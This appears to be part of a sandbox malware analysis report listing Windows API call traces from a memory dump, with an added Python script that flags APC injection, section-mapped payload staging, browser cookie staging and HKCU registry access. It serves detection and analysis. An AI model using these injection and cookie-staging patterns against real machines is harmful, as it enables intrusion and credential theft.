  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
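The entries above are per-function API sequences, and it is the sequence rather than any single call that carries the signal: CreateToolhelp32Snapshot plus Thread32First/Thread32Next is also what a benign monitoring tool does, while OpenThread (001F03FF is the legacy THREAD_ALL_ACCESS mask) followed by QueueUserAPC on every enumerated thread is the APC-injection primitive. Likewise the subcall NtCreateSection(?,000F001F,?,?,00000040,08000000,...) decodes to SECTION_ALL_ACCESS, PAGE_EXECUTE_READWRITE and SEC_COMMIT, and together with NtMapViewOfSection, the 0x800-byte memcpy and NtUnmapViewOfSection it is a section-object payload-staging pattern; the function carrying %APPDATA%\Mozilla\Firefox\Profiles, \cookie.ff, \cookie.ie and \sols stages browser cookie stores; and RegCreateKeyA/RegOpenKeyA with 80000001 as the first argument operate under HKEY_CURRENT_USER. The following script is an added example, not part of the Joe Sandbox report: it parses function entries in the exact line format printed above (treating "Part of subcall function" lines as inherited calls that are excluded from the ordered-sequence check) and applies those four rules. The rule names and the threshold choices are the example's own, and the sample input is constructed from the report's line format, abbreviated to the lines the rules need.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# "• [Part of subcall function ADDR: ]Api.MODULE[(args)], ref: ADDR"; args are absent for e.g. memset.NTDLL
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
                      r"(?P<api>\w+)\.[A-Z0-9]+(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)$")

@dataclass
class Call:
    api: str
    args: list[str]
    ref: str             # call-site address in the dump
    subcall: str | None  # sub-function the call is inherited from ("Part of subcall function"), else None

@dataclass
class FunctionEntry:
    api_id: str = ""
    string_id: str = ""  # '$'-separated string references, as the report prints them
    calls: list[Call] = field(default_factory=list)

def parse_entries(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per 'Similarity' block; text before the first block is ignored."""
    entries: list[FunctionEntry] = []
    cur: FunctionEntry | None = None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is None:
            continue
        elif (m := FIELD_LINE.match(line)):
            if m.group("key") == "API ID":
                cur.api_id = m.group("val").strip()
            else:
                cur.string_id = m.group("val").strip()
        elif (m := API_LINE.match(line)):
            args = [a.strip() for a in (m.group("args") or "").split(",") if a.strip()]
            cur.calls.append(Call(m.group("api"), args, m.group("ref"), m.group("sub")))
    return entries

def in_order(seq: list[str], *needles: str) -> bool:
    """True when every needle occurs in seq in the given relative order."""
    pos = 0
    for n in needles:
        if n not in seq[pos:]:
            return False
        pos = seq.index(n, pos) + 1
    return True

def classify(e: FunctionEntry) -> list[str]:
    """Behavioural rules (names are this example's own) that the function's call sequence satisfies."""
    direct, every = [c.api for c in e.calls if not c.subcall], {c.api for c in e.calls}
    tags: list[str] = []
    # Thread enumeration, then OpenThread + QueueUserAPC per thread: the APC-injection primitive.
    if in_order(direct, "CreateToolhelp32Snapshot", "Thread32First", "OpenThread", "QueueUserAPC"):
        tags.append("apc_injection")
    # Section created and mapped, filled with memcpy, then unmapped: payload staging via a section object.
    if {"NtCreateSection", "NtMapViewOfSection", "memcpy", "NtUnmapViewOfSection"} <= every:
        tags.append("section_mapping")
    # Firefox profile path plus directory/file manipulation: cookie stores being staged for collection.
    if "\\Mozilla\\Firefox\\Profiles" in e.string_id and {"CreateDirectoryW", "DeleteFileW"} <= every:
        tags.append("browser_artifact_staging")
    # Registry key created or opened with HKEY_CURRENT_USER (printed as 80000001) as the root handle.
    if any(c.api in ("RegCreateKeyA", "RegOpenKeyA") and c.args[:1] == ["80000001"] for c in e.calls):
        tags.append("hkcu_registry_access")
    return tags

def triage(report_text: str) -> dict[str, list[str]]:
    """Map each function's API ID to the rules it triggers; functions with no hits are omitted."""
    return {e.api_id: tags for e in parse_entries(report_text) if (tags := classify(e))}

# Constructed sample: four entries from the report, abbreviated to the lines the rules need.
SAMPLE = r"""Similarity
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
Similarity
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
Similarity
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
APIs
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
Similarity
  • API ID: RegCreateKeyRegOpenKeylstrlen
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
"""
```

Running triage(SAMPLE) returns one tag per sample function. Inherited "Part of subcall function" calls are deliberately kept out of the ordered APC check, because the report repeats them under every caller and they would otherwise make unrelated functions match; they are still counted for the set-based section-mapping rule, where the NtCreateSection and NtMapViewOfSection calls only appear as subcalls.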
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
